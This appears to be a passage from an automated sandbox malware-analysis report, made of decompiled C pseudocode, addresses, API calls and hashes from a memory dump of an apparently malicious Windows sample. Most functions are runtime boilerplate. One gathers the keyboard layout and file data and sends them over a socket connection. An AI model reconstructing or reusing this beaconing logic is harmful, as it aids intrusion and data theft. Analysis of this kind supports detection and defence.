                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3a003a77e8d280062c0c1f8de6d3415d2367177e8accdb01db95227a9e864899
                    • Instruction ID: ad1c0323e0faeaec9e41041c34fc86b33e0f1904aa3223452c38cea5d8ae8113
                    • Opcode Fuzzy Hash: 3a003a77e8d280062c0c1f8de6d3415d2367177e8accdb01db95227a9e864899
                    • Instruction Fuzzy Hash: 4301A2B26097153EF6221E786CC1FA7631DDB42BBAB35032FF521612D2DE68CD414178
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 82%
                    			E00443492(signed int __eax, void* __ecx) {
                    				signed int _t2;
                    				signed int _t3;
                    				int _t10;
                    				int _t11;
                    				void* _t13;
                    				char** _t16;
                    				short* _t19;
                    				void* _t20;
                    
                    				_t13 = __ecx;
                    				_t16 =  *0x4714e0; // 0x7b3488
                    				if(_t16 != 0) {
                    					_t10 = 0;
                    					while( *_t16 != _t10) {
                    						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
                    						_t11 = _t2;
                    						if(_t11 == 0) {
                    							L11:
                    							_t3 = _t2 | 0xffffffff;
                    						} else {
                    							_t19 = E004454E5(_t13, _t11, 2);
                    							_pop(_t13);
                    							if(_t19 == 0) {
                    								L10:
                    								_t2 = E00446172(_t19);
                    								goto L11;
                    							} else {
                    								_t10 = 0;
                    								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
                    									goto L10;
                    								} else {
                    									_push(0);
                    									_push(_t19);
                    									E0044F4DA(_t13);
                    									E00446172(0);
                    									_t20 = _t20 + 0xc;
                    									_t16 =  &(_t16[1]);
                    									continue;
                    								}
                    							}
                    						}
                    						L9:
                    						return _t3;
                    						goto L12;
                    					}
                    					_t3 = 0;
                    					goto L9;
                    				} else {
                    					return __eax | 0xffffffff;
                    				}
                    				L12:
                    			}











                    0x00443492
                    0x00443495
                    0x0044349d
                    0x004434a6
                    0x004434f5
                    0x004434b2
                    0x004434b8
                    0x004434bc
                    0x00443506
                    0x00443506
                    0x004434be
                    0x004434c6
                    0x004434c9
                    0x004434cc
                    0x004434ff
                    0x00443500
                    0x00000000
                    0x004434ce
                    0x004434d4
                    0x004434e0
                    0x00000000
                    0x004434e2
                    0x004434e2
                    0x004434e3
                    0x004434e4
                    0x004434ea
                    0x004434ef
                    0x004434f2
                    0x00000000
                    0x004434f2
                    0x004434e0
                    0x004434cc
                    0x004434fb
                    0x004434fe
                    0x00000000
                    0x004434fe
                    0x004434f9
                    0x00000000
                    0x0044349f
                    0x004434a3
                    0x004434a3
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a9f5f2da4d9e83e31878e3bdd16e09e6dd82e01db3e18c3b2da0a9591605e44d
                    • Instruction ID: dd9fd6309cf4e1d65556bdef1b86144513f0dee4d60a50e1d93828192d45d13b
                    • Opcode Fuzzy Hash: a9f5f2da4d9e83e31878e3bdd16e09e6dd82e01db3e18c3b2da0a9591605e44d
                    • Instruction Fuzzy Hash: 340126B22092027EF6221E792CC1DA7635DDF42BBA334433BF821512D2DE38CE014129
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E00447F75(signed int _a4) {
                    				signed int _t9;
                    				void* _t13;
                    				signed int _t15;
                    				WCHAR* _t22;
                    				signed int _t24;
                    				signed int* _t25;
                    				void* _t27;
                    
                    				_t9 = _a4;
                    				_t25 = 0x471668 + _t9 * 4;
                    				_t24 =  *_t25;
                    				if(_t24 == 0) {
                    					_t22 =  *(0x45dc60 + _t9 * 4);
                    					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                    					if(_t27 != 0) {
                    						L8:
                    						 *_t25 = _t27;
                    						if( *_t25 != 0) {
                    							FreeLibrary(_t27);
                    						}
                    						_t13 = _t27;
                    						L11:
                    						return _t13;
                    					}
                    					_t15 = GetLastError();
                    					if(_t15 != 0x57) {
                    						_t27 = 0;
                    					} else {
                    						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                    						_t27 = _t15;
                    					}
                    					if(_t27 != 0) {
                    						goto L8;
                    					} else {
                    						 *_t25 = _t15 | 0xffffffff;
                    						_t13 = 0;
                    						goto L11;
                    					}
                    				}
                    				_t4 = _t24 + 1; // 0xc3a97827
                    				asm("sbb eax, eax");
                    				return  ~_t4 & _t24;
                    			}










                    0x00447f7a
                    0x00447f7e
                    0x00447f85
                    0x00447f89
                    0x00447f97
                    0x00447fad
                    0x00447fb1
                    0x00447fda
                    0x00447fdc
                    0x00447fe0
                    0x00447fe3
                    0x00447fe3
                    0x00447fe9
                    0x00447feb
                    0x00000000
                    0x00447fec
                    0x00447fb3
                    0x00447fbc
                    0x00447fcb
                    0x00447fbe
                    0x00447fc1
                    0x00447fc7
                    0x00447fc7
                    0x00447fcf
                    0x00000000
                    0x00447fd1
                    0x00447fd4
                    0x00447fd6
                    0x00000000
                    0x00447fd6
                    0x00447fcf
                    0x00447f8b
                    0x00447f90
                    0x00000000

                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00447F1C,00000000,00000000,00000000,00000000,?,00448248,00000006,FlsSetValue), ref: 00447FA7
                    • GetLastError.KERNEL32(?,00447F1C,00000000,00000000,00000000,00000000,?,00448248,00000006,FlsSetValue,0045E150,0045E158,00000000,00000364,?,00447CD7), ref: 00447FB3
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00447F1C,00000000,00000000,00000000,00000000,?,00448248,00000006,FlsSetValue,0045E150,0045E158,00000000), ref: 00447FC1
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID:
                    • API String ID: 3177248105-0
                    • Opcode ID: d74fdbf6bbca8da48ddd37c8106ba8ce0839b4e59c1599561e2889c12998a42e
                    • Instruction ID: fe6fe62afa8acc670efe8b21ff5e9bf1ac66aca0d2789bcfd7635b307ec9571a
                    • Opcode Fuzzy Hash: d74fdbf6bbca8da48ddd37c8106ba8ce0839b4e59c1599561e2889c12998a42e
                    • Instruction Fuzzy Hash: D901F7326197239BE7214B78AC44E5B7B98AF44BA2B114635F906E7241DB24DC06CAEC
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041BF1A(void* __edx) {
                    				long _v12;
                    				void* __ebx;
                    				void* __ecx;
                    				void* __edi;
                    				void* __ebp;
                    				struct _OVERLAPPED* _t12;
                    				WCHAR* _t13;
                    				void* _t17;
                    				long _t19;
                    				void* _t21;
                    
                    				_t12 = 0;
                    				_t21 = __edx;
                    				_t17 = CreateFileW(_t13, 0x80000000, 3, 0, 3, 0x80, 0);
                    				if(_t17 != 0xffffffff) {
                    					_t19 = GetFileSize(_t17, 0);
                    					E0040244E(0, _t21, _t17, _t21, _t19, 0);
                    					_v12 = 0;
                    					if(ReadFile(_t17, E00401FAB(_t21), _t19,  &_v12, 0) != 0) {
                    						_t12 = 1;
                    					}
                    					CloseHandle(_t17);
                    					return _t12;
                    				}
                    				return 0;
                    			}













                    0x0041bf1e
                    0x0041bf20
                    0x0041bf39
                    0x0041bf3e
                    0x0041bf4d
                    0x0041bf53
                    0x0041bf5d
                    0x0041bf75
                    0x0041bf77
                    0x0041bf77
                    0x0041bf7a
                    0x00000000
                    0x0041bf80
                    0x00000000

                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A6B8), ref: 0041BF33
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0041BF47
                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041BF6C
                    • CloseHandle.KERNEL32(00000000), ref: 0041BF7A
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleReadSize
                    • String ID:
                    • API String ID: 3919263394-0
                    • Opcode ID: 331c2207abdab35e0c55e3462ea2dbb35f66433fa764a6badeffeb927098dc03
                    • Instruction ID: 783a39aab90790ef131ccc4ad3186ba93c6f7b6828baf18b7c63c3b3539a568f
                    • Opcode Fuzzy Hash: 331c2207abdab35e0c55e3462ea2dbb35f66433fa764a6badeffeb927098dc03
                    • Instruction Fuzzy Hash: 8CF0C2B12412087FE2101B25AC85EBB3A5CEB867AAF00067EF801F22D1CF298C068579
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 19%
                    			E00439273(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				void* _t25;
                    				void* _t27;
                    				void* _t28;
                    				void* _t29;
                    				intOrPtr _t30;
                    				intOrPtr* _t32;
                    				void* _t34;
                    
                    				_t29 = __edx;
                    				_t27 = __ebx;
                    				_t36 = _a28;
                    				_t30 = _a8;
                    				if(_a28 != 0) {
                    					_push(_a28);
                    					_push(_a24);
                    					_push(_t30);
                    					_push(_a4);
                    					E004398C2(_t36);
                    					_t34 = _t34 + 0x10;
                    				}
                    				_t37 = _a40;
                    				_push(_a4);
                    				if(_a40 != 0) {
                    					_push(_a40);
                    				} else {
                    					_push(_t30);
                    				}
                    				E00438DC7(_t28);
                    				_t32 = _a32;
                    				_push( *_t32);
                    				_push(_a20);
                    				_push(_a16);
                    				_push(_t30);
                    				E00439AC4(_t27, _t28, _t29, _t30, _t37);
                    				_push(0x100);
                    				_push(_a36);
                    				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
                    				_push( *((intOrPtr*)(_a24 + 0xc)));
                    				_push(_a20);
                    				_push(_a12);
                    				_push(_t30);
                    				_push(_a4);
                    				_t25 = E0043907D(_t29, _t32, _t37);
                    				if(_t25 != 0) {
                    					E00438D95(_t25, _t30);
                    					return _t25;
                    				}
                    				return _t25;
                    			}













                    0x00439273
                    0x00439273
                    0x00439276
                    0x0043927b
                    0x0043927e
                    0x00439280
                    0x00439283
                    0x00439286
                    0x00439287
                    0x0043928a
                    0x0043928f
                    0x0043928f
                    0x00439292
                    0x00439296
                    0x00439299
                    0x0043929e
                    0x0043929b
                    0x0043929b
                    0x0043929b
                    0x004392a1
                    0x004392a7
                    0x004392aa
                    0x004392ac
                    0x004392af
                    0x004392b2
                    0x004392b3
                    0x004392bc
                    0x004392c1
                    0x004392c4
                    0x004392ca
                    0x004392cd
                    0x004392d0
                    0x004392d3
                    0x004392d4
                    0x004392d7
                    0x004392e2
                    0x004392e6
                    0x00000000
                    0x004392e6
                    0x004392ed

                    APIs
                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043928A
                      • Part of subcall function 004398C2: ___AdjustPointer.LIBCMT ref: 0043990C
                    • _UnwindNestedFrames.LIBCMT ref: 004392A1
                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 004392B3
                    • CallCatchBlock.LIBVCRUNTIME ref: 004392D7
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                    • String ID:
                    • API String ID: 2633735394-0
                    • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                    • Instruction ID: b06b7f893415a7930fd60433c3970d3f2ebbd8779783d30230f11c435e48e423
                    • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                    • Instruction Fuzzy Hash: A4012932000609BBCF12AF56CC01EDB7BBAFF9C714F04945AF91865120C77AE861DBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00418E78(intOrPtr _a4, intOrPtr _a8) {
                    				int _v4;
                    				void* __ecx;
                    				int _t9;
                    				void* _t13;
                    				int _t26;
                    				int _t29;
                    
                    				_t9 = GetSystemMetrics(0x4c);
                    				_t26 = GetSystemMetrics(0x4d);
                    				_t29 = GetSystemMetrics(0x4e);
                    				_v4 = GetSystemMetrics(0x4f);
                    				if(_t9 < 0) {
                    					_a4 = _a4 + E00418029();
                    				}
                    				if(_t26 < 0) {
                    					_a8 = _a8 + E00418029();
                    				}
                    				_t13 = E00418EDF(_a4, _t29);
                    				E00418EDF(_a8, _v4);
                    				return _t13;
                    			}









                    0x00418e85
                    0x00418e8f
                    0x00418e95
                    0x00418e99
                    0x00418e9f
                    0x00418ea8
                    0x00418ea8
                    0x00418eae
                    0x00418eb7
                    0x00418eb7
                    0x00418ec1
                    0x00418ed0
                    0x00418ede

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: MetricsSystem
                    • String ID:
                    • API String ID: 4116985748-0
                    • Opcode ID: 94c6513850f725b6dff4d36a5a73f434d76553a5f7fb36ad5616d43af1263393
                    • Instruction ID: a34c293854aa0c7f43a8fb02918d68c233228731aa2cd1c3ed0304f321bfc432
                    • Opcode Fuzzy Hash: 94c6513850f725b6dff4d36a5a73f434d76553a5f7fb36ad5616d43af1263393
                    • Instruction Fuzzy Hash: 5CF0C871B003155BD700EB758C41A6B7BD69BD4264F10043FF609C7381EEB8DC454784
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00438941() {
                    				void* _t4;
                    				void* _t8;
                    
                    				E00439D23();
                    				E004388D5();
                    				if(E00439E4A() != 0) {
                    					_t4 = E00439DFC(_t8, __eflags);
                    					__eflags = _t4;
                    					if(_t4 != 0) {
                    						return 1;
                    					} else {
                    						E00439E86();
                    						goto L1;
                    					}
                    				} else {
                    					L1:
                    					return 0;
                    				}
                    			}





                    0x00438941
                    0x00438946
                    0x00438952
                    0x00438957
                    0x0043895c
                    0x0043895e
                    0x00438969
                    0x00438960
                    0x00438960
                    0x00000000
                    0x00438960
                    0x00438954
                    0x00438954
                    0x00438956
                    0x00438956

                    APIs
                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438941
                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438946
                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0043894B
                      • Part of subcall function 00439E4A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00439E5B
                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438960
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                    • String ID:
                    • API String ID: 1761009282-0
                    • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                    • Instruction ID: c085b0979e5a9669b34718e80ce13ad603c1b09c39006b0d744c5c8f91385809
                    • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                    • Instruction Fuzzy Hash: D0C00294404346A43C94BAB315533BA87141D6EB9CF90348FB8A5275438D8D090B552F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 004426CD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorHandling__start
                    • String ID: pow
                    • API String ID: 3213639722-2276729525
                    • Opcode ID: 87fad970ce9d37e19c93887b2032ddd578094caf60899593f5d8ef160855613f
                    • Instruction ID: 77474bc5f42896c1e670be3d71df27219822db19ca08cc942a34a4a8a16969c1
                    • Opcode Fuzzy Hash: 87fad970ce9d37e19c93887b2032ddd578094caf60899593f5d8ef160855613f
                    • Instruction Fuzzy Hash: 1F515E71E0820286FB157B14CE4136F2B94BB41751F608DAFF485423A9EBBCCC959A4F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00409DCA(void* __ecx, void* __edx, char _a4) {
                    				char _v12;
                    				void* _v40;
                    				char _v44;
                    				char _v68;
                    				void* _v72;
                    				char _v92;
                    				void* _v96;
                    				char _v116;
                    				void* _v120;
                    				char _v140;
                    				void* _v144;
                    				char _v164;
                    				void* _v168;
                    				char _v188;
                    				void* _v192;
                    				char _v212;
                    				void* _v216;
                    				char _v236;
                    				void* _v240;
                    				char _v260;
                    				void* _v264;
                    				char _v284;
                    				void* _v288;
                    				char _v308;
                    				void* _v312;
                    				char _v332;
                    				void* _v336;
                    				char _v356;
                    				void* _v360;
                    				char _v380;
                    				void* _v384;
                    				char _v396;
                    				char _v399;
                    				char _v403;
                    				char _v404;
                    				void* _v408;
                    				char _v416;
                    				void* _v432;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed char* _t51;
                    				void* _t52;
                    				void* _t53;
                    				void* _t57;
                    				void* _t58;
                    				void* _t72;
                    				void* _t91;
                    				void* _t148;
                    				intOrPtr _t149;
                    				intOrPtr _t152;
                    				void* _t166;
                    
                    				_t148 = __edx;
                    				E00401FC0(__ecx + 0x98,  &_a4);
                    				_v404 = 0;
                    				_v403 = 0;
                    				_v399 = 0;
                    				GetKeyboardLayoutNameA( &_v404);
                    				E0040482D(0x474190);
                    				E004048C8(0x474190, _t166, 0x474190);
                    				E0040417E(_t91,  &_v396, _t148, 0x474190,  *0x474128);
                    				_t51 = E00401FAB(E00401E65(0x4740cc, _t148, 0x474190, 0, 0x12));
                    				_t149 =  *0x474124; // 0x0
                    				_t52 = E0041B623(_t91,  &_v44, _t149);
                    				_t53 = E0041B7B3(0x473ec8,  &_v68,  &_v404);
                    				_t57 = E0041B623(0x473ec8,  &_v92, E0041BFAA(E00401F04(0x474140)));
                    				_t152 =  *0x474188; // 0x0
                    				_t58 = E0041B623(0x473ec8,  &_v116, _t152);
                    				E00402EA1( &_v404 - 0x18, E00402F10(0x473ec8,  &_v380, E00402EA1( &_v356, E00402F10(0x473ec8,  &_v332, E00402F10(0x473ec8,  &_v308, E00402F10(0x473ec8,  &_v284, E00402EA1( &_v260, E00402F10(0x473ec8,  &_v236, E00402EA1( &_v212, E00402F10(0x473ec8,  &_v188, E004090C4(0x473ec8,  &_v164, E0040531E( &_v140,  &_v416, 0x474190, 0x473ec8),  &_v404 - 0x18, 0x474190, 0,  *_t51 & 0x000000ff), 0x474190, 0, 0x473ec8), _t58), 0x474190, 0, 0x473ec8), _t57), 0x474190, 0, 0x473ec8), 0x474190, 0,  &_v12), 0x474190, 0, 0x473ec8), _t53), 0x474190, 0, 0x473ec8), _t52);
                    				_push(0x12);
                    				_t72 = E00404AA1(0x474190, _t70, 0);
                    				E00401FD8();
                    				E00401FD8();
                    				E00401FD8();
                    				E00401FD8();
                    				E00401FD8();
                    				E00401FD8();
                    				E00401FD8();
                    				E00401FD8();
                    				E00401FD8();
                    				E00401FD8();
                    				E00401FD8();
                    				E00401FD8();
                    				E00401FD8();
                    				E00401FD8();
                    				E00401FD8();
                    				E00401F09();
                    				E00401FD8();
                    				return _t72;
                    			}
























































                    0x00409dca
                    0x00409de2
                    0x00409de9
                    0x00409ded
                    0x00409df1
                    0x00409dfa
                    0x00409e07
                    0x00409e0f
                    0x00409e1e
                    0x00409e31
                    0x00409e36
                    0x00409e45
                    0x00409e61
                    0x00409e8b
                    0x00409e90
                    0x00409e9f
                    0x00409f50
                    0x00409f56
                    0x00409f5a
                    0x00409f65
                    0x00409f6e
                    0x00409f77
                    0x00409f83
                    0x00409f8f
                    0x00409f9b
                    0x00409fa7
                    0x00409fb3
                    0x00409fbf
                    0x00409fcb
                    0x00409fd7
                    0x00409fe3
                    0x00409fef
                    0x00409ffb
                    0x0040a007
                    0x0040a010
                    0x0040a01c
                    0x0040a02d

                    APIs
                    • GetKeyboardLayoutNameA.USER32 ref: 00409DFA
                      • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,007D7AC8,00000010), ref: 004048E0
                      • Part of subcall function 0041BFAA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409E82,00473EC8,?,00473EC8,00000000,00473EC8,00000000), ref: 0041BFBF
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFileKeyboardLayoutNameconnectsend
                    • String ID: @AG$X2}
                    • API String ID: 1634807452-2039212294
                    • Opcode ID: 73ca9d5f1b9d14f021ddedd4c246f89c59f9e07717c48b46f137dedd6bba8db5
                    • Instruction ID: 42e5e38056b62e7f6b2625c3e6c05af0dbce859a07661a17710ef6c61ee761fc
                    • Opcode Fuzzy Hash: 73ca9d5f1b9d14f021ddedd4c246f89c59f9e07717c48b46f137dedd6bba8db5
                    • Instruction Fuzzy Hash: B15121312082415AC329FB22D895AFFB3E5AFD4344F50493FF44AA71E2EF78594AC649
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 73%
                    			E0044500D(void* __ebx, void* __ecx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr* _a12) {
                    				signed int _v8;
                    				signed int _v12;
                    				void* _v20;
                    				signed int _t21;
                    				void* _t23;
                    				signed int _t27;
                    				signed int _t31;
                    				intOrPtr* _t35;
                    				intOrPtr* _t46;
                    				void* _t56;
                    				void* _t62;
                    				signed short* _t64;
                    				intOrPtr _t66;
                    				intOrPtr* _t68;
                    				intOrPtr _t70;
                    				signed int _t71;
                    				void* _t72;
                    				intOrPtr* _t74;
                    
                    				_t53 = __ebx;
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t21 =  *0x47000c; // 0xc3a97826
                    				_v8 = _t21 ^ _t71;
                    				_t64 = _a4;
                    				if(_t64 != 0) {
                    					_t23 = E004476DC(__ebx, __ecx, _t64, _a8);
                    					_pop(_t56);
                    					if(_t23 < _a8) {
                    						_t68 = 0;
                    						_t26 =  *((intOrPtr*)( *_a12 + 0xa8));
                    						if( *((intOrPtr*)( *_a12 + 0xa8)) == 0) {
                    							while( *_t64 != _t68) {
                    								_t27 =  *_t64 & 0x0000ffff;
                    								if(_t27 >= 0x41 && _t27 <= 0x5a) {
                    									 *_t64 = _t27 + 0x20;
                    								}
                    								_t64 =  &(_t64[1]);
                    							}
                    							L29:
                    							return E004349BB(_v8 ^ _t71);
                    						}
                    						_t31 = E0045274B(__ebx, _t56, _t26, 0x100, _t64, 0xffffffff, 0, 0);
                    						_t74 = _t72 + 0x18;
                    						_v12 = _t31;
                    						if(_t31 != 0) {
                    							if(_a8 >= _t31) {
                    								_t62 = _t31 + _t31;
                    								_t59 = _t62 + 8;
                    								asm("sbb eax, eax");
                    								if((_t62 + 0x00000008 & _t31) == 0) {
                    									L23:
                    									if(_t68 != 0) {
                    										if(E0045274B(_t53, _t59,  *((intOrPtr*)( *_a12 + 0xa8)), 0x100, _t64, 0xffffffff, _t68, _v12) == 0) {
                    											_t35 = E0043FFBD();
                    											_t66 = 0x2a;
                    											 *_t35 = _t66;
                    										} else {
                    											_t66 = E00447551(_t64, _a8, _t68);
                    										}
                    										L28:
                    										E0043585D(_t68);
                    										goto L29;
                    									}
                    									L24:
                    									 *((intOrPtr*)(E0043FFBD())) = 0xc;
                    									_t66 =  *((intOrPtr*)(E0043FFBD()));
                    									goto L28;
                    								}
                    								asm("sbb eax, eax");
                    								_t41 = _t31 & _t62 + 0x00000008;
                    								_t59 = _t62 + 8;
                    								if((_t31 & _t62 + 0x00000008) > 0x400) {
                    									asm("sbb eax, eax");
                    									_t68 = E00445B29(_t59, _t41 & _t59);
                    									_pop(_t59);
                    									if(_t68 == 0) {
                    										goto L24;
                    									}
                    									 *_t68 = 0xdddd;
                    									L22:
                    									_t68 = _t68 + 8;
                    									goto L23;
                    								}
                    								asm("sbb eax, eax");
                    								E00456BA0();
                    								_t68 = _t74;
                    								if(_t68 == 0) {
                    									goto L24;
                    								}
                    								 *_t68 = 0xcccc;
                    								goto L22;
                    							}
                    							 *_t64 = 0;
                    							_t46 = E0043FFBD();
                    							_push(0x22);
                    							L2:
                    							_pop(_t70);
                    							 *_t46 = _t70;
                    							E0043B6B0();
                    							goto L29;
                    						}
                    						 *((intOrPtr*)(E0043FFBD())) = 0x2a;
                    						E0043FFBD();
                    						goto L29;
                    					}
                    					 *_t64 = 0;
                    				}
                    				_t46 = E0043FFBD();
                    				_push(0x16);
                    				goto L2;
                    			}





















                    0x0044500d
                    0x00445012
                    0x00445013
                    0x00445014
                    0x0044501b
                    0x00445020
                    0x00445025
                    0x00445041
                    0x00445047
                    0x0044504b
                    0x00445057
                    0x0044505b
                    0x00445063
                    0x004450ac
                    0x00445096
                    0x0044509c
                    0x004450a6
                    0x004450a6
                    0x004450a9
                    0x004450a9
                    0x00445183
                    0x00445195
                    0x00445195
                    0x00445070
                    0x00445075
                    0x00445078
                    0x0044507d
                    0x004450bb
                    0x004450ce
                    0x004450d1
                    0x004450d6
                    0x004450da
                    0x00445124
                    0x00445126
                    0x0044515d
                    0x00445170
                    0x00445177
                    0x00445178
                    0x0044515f
                    0x0044516c
                    0x0044516c
                    0x0044517a
                    0x0044517b
                    0x00000000
                    0x00445181
                    0x00445128
                    0x0044512d
                    0x00445138
                    0x00000000
                    0x00445138
                    0x004450e1
                    0x004450e3
                    0x004450e5
                    0x004450ed
                    0x0044510a
                    0x00445114
                    0x00445116
                    0x00445119
                    0x00000000
                    0x00000000
                    0x0044511b
                    0x00445121
                    0x00445121
                    0x00000000
                    0x00445121
                    0x004450f1
                    0x004450f5
                    0x004450fa
                    0x004450fe
                    0x00000000
                    0x00000000
                    0x00445100
                    0x00000000
                    0x00445100
                    0x004450bf
                    0x004450c2
                    0x004450c7
                    0x0044502e
                    0x0044502e
                    0x0044502f
                    0x00445031
                    0x00000000
                    0x00445036
                    0x00445084
                    0x0044508a
                    0x00000000
                    0x0044508f
                    0x0044504f
                    0x0044504f
                    0x00445027
                    0x0044502c
                    0x00000000

                    APIs
                    Strings
                    Memory Dump Source
